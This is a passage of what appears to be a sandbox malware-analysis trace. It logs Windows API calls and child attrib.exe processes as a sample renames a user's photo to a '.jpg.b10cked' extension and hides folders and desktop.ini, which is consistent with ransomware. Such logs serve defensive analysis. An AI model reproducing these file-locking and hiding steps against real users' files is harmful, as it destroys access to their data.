_wcsicmp (_String1="move", _String2="CLS") returned 10 [0144.957] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0144.957] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0144.957] _wcsicmp (_String1="move", _String2="VER") returned -9 [0144.958] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0144.958] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0144.958] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0144.958] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0144.958] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0144.958] _wcsicmp (_String1="move", _String2="START") returned -6 [0144.958] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0144.958] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0144.958] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0144.959] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0144.959] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0144.959] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x30f41c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x30f414, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x30f414*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0144.963] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0144.963] _wcsicmp (_String1="QO_V_I~1.JPG", _String2=".") returned 67 [0144.963] _wcsicmp (_String1="QO_V_I~1.JPG", _String2="..") returned 67 [0144.963] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_V_I~1.JPG" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\qo_v_i~1.jpg")) returned 0x20 [0144.963] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4b1e90 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0144.963] SetErrorMode (uMode=0x0) returned 0x0 [0144.963] SetErrorMode (uMode=0x1) returned 0x0 [0144.963] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_V_I~1.JPG", nBufferLength=0x104, lpBuffer=0x30eda4, lpFilePart=0x30ed8c | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_V_I~1.JPG", lpFilePart=0x30ed8c*="QO_V_I~1.JPG") returned 0x2f [0144.963] SetErrorMode (uMode=0x0) returned 0x1 [0144.963] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1")) returned 0x10 [0144.964] _wcsicmp (_String1="QO_V_I~1.JPG", _String2=".") returned 67 [0144.964] _wcsicmp (_String1="QO_V_I~1.JPG", _String2="..") returned 67 [0144.964] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_V_I~1.JPG" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\qo_v_i~1.jpg")) returned 0x20 [0144.964] SetErrorMode (uMode=0x0) returned 0x0 [0144.964] SetErrorMode (uMode=0x1) returned 0x0 [0144.964] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_V_I~1.JPG", nBufferLength=0x104, lpBuffer=0x30f220, lpFilePart=0x30efb8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_V_I~1.JPG", lpFilePart=0x30efb8*="QO_V_I~1.JPG") returned 0x2f [0144.964] SetErrorMode (uMode=0x0) returned 0x1 [0144.964] SetErrorMode (uMode=0x0) returned 0x0 [0144.964] SetErrorMode (uMode=0x1) returned 0x0 [0144.964] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_v_Iwy7B17SYlN-.jpg.b10cked", nBufferLength=0x104, lpBuffer=0x30f428, lpFilePart=0x30efb8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_v_Iwy7B17SYlN-.jpg.b10cked", lpFilePart=0x30efb8*="QO_v_Iwy7B17SYlN-.jpg.b10cked") returned 0x40 [0144.964] SetErrorMode (uMode=0x0) returned 0x1 [0144.964] SetLastError (dwErrCode=0x0) [0144.964] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_v_Iwy7B17SYlN-.jpg.b10cked" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\qo_v_iwy7b17syln-.jpg.b10cked")) returned 0xffffffff [0144.965] GetLastError () returned 0x2 [0144.965] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_V_I~1.JPG", fInfoLevelId=0x1, lpFindFileData=0x30e934, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30e934) returned 0x4a0ef0 [0144.965] FindNextFileW (in: hFindFile=0x4a0ef0, lpFindFileData=0x30e934 | out: lpFindFileData=0x30e934) returned 0 [0144.965] GetLastError () returned 0x12 [0144.965] FindClose (in: hFindFile=0x4a0ef0 | out: hFindFile=0x4a0ef0) returned 1 [0144.967] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_V_I~1.JPG", fInfoLevelId=0x1, lpFindFileData=0x4b1c30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4b1c30) returned 0x4a0ef0 [0144.967] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_v_Iwy7B17SYlN-.jpg.b10cked", nBufferLength=0x104, lpBuffer=0x30ebcc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_v_Iwy7B17SYlN-.jpg.b10cked", lpFilePart=0x0) returned 0x40 [0144.967] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_v_Iwy7B17SYlN-.jpg", nBufferLength=0x104, lpBuffer=0x30ebcc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_v_Iwy7B17SYlN-.jpg", lpFilePart=0x0) returned 0x38 [0144.967] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_v_Iwy7B17SYlN-.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\qo_v_iwy7b17syln-.jpg")) returned 0x20 [0144.967] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_v_Iwy7B17SYlN-.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\qo_v_iwy7b17syln-.jpg"), lpNewFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_v_Iwy7B17SYlN-.jpg.b10cked" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\qo_v_iwy7b17syln-.jpg.b10cked"), dwFlags=0x3) returned 1 [0144.967] FindClose (in: hFindFile=0x4a0ef0 | out: hFindFile=0x4a0ef0) returned 1 [0144.968] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x30eb80 | out: _Buffer=" 1") returned 9 [0144.968] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.968] GetFileType (hFile=0x7) returned 0x2 [0145.052] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0145.052] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30eb0c | out: lpMode=0x30eb0c) returned 1 [0145.052] _get_osfhandle (_FileHandle=1) returned 0x7 [0145.052] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x30eb40 | out: lpConsoleScreenBufferInfo=0x30eb40) returned 1 [0145.052] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0145.053] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x30eb80 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0145.053] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x30eb64, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x30eb64*=0x1a) returned 1 [0145.053] _get_osfhandle (_FileHandle=1) returned 0x7 [0145.053] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0145.053] _get_osfhandle (_FileHandle=1) returned 0x7 [0145.053] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0145.053] _get_osfhandle (_FileHandle=0) returned 0x3 [0145.053] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0145.053] SetConsoleInputExeNameW () returned 0x1 [0145.053] GetConsoleOutputCP () returned 0x1b5 [0145.053] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0145.054] SetThreadUILanguage (LangId=0x0) returned 0x409 [0145.054] exit (_Code=0) Process: id = "199" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16ae0" os_pid = "0x958" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "197" os_parent_pid = "0x954" cmd_line = "attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 17457 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 17458 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 17459 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 17460 start_va = 0x1d0000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 17461 start_va = 0x6d0000 end_va = 0x6d6fff entry_point = 0x6d0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 17462 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 17463 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 17464 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 17465 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 17466 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 17467 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 17468 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 17469 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 17470 start_va = 0x1a0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17471 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 17472 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 17473 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 17474 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 17475 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 17476 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 17477 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 17478 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 17479 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 17480 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 17481 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 17482 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 17483 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 17484 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 17485 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 17486 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 256 os_tid = 0x98c Process: id = "200" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16ae0" os_pid = "0xb4c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "197" os_parent_pid = "0x954" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 17487 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 17488 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 17489 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 17490 start_va = 0x1d0000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 17491 start_va = 0xd00000 end_va = 0xd06fff entry_point = 0xd00000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 17492 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 17493 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 17494 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 17495 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 17496 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 17497 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 17498 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 17499 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 17500 start_va = 0x140000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 17501 start_va = 0x2b0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 17502 start_va = 0x6e2b0000 end_va = 0x6e2ccfff entry_point = 0x6e2b0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 17503 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 17504 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 17505 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 17506 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 17507 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 17508 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 17509 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 17510 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 17511 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 17512 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 17513 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 17514 start_va = 0x3b0000 end_va = 0x477fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 17515 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 17516 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 257 os_tid = 0x990 Process: id = "201" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16ae0" os_pid = "0xad0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "197" os_parent_pid = "0x954" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 17593 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 17594 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 17595 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 17596 start_va = 0x130000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 17597 start_va = 0xd90000 end_va = 0xd96fff entry_point = 0xd90000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 17598 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 17599 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 17600 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 17601 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 17602 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 17603 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 17604 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 17605 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 17606 start_va = 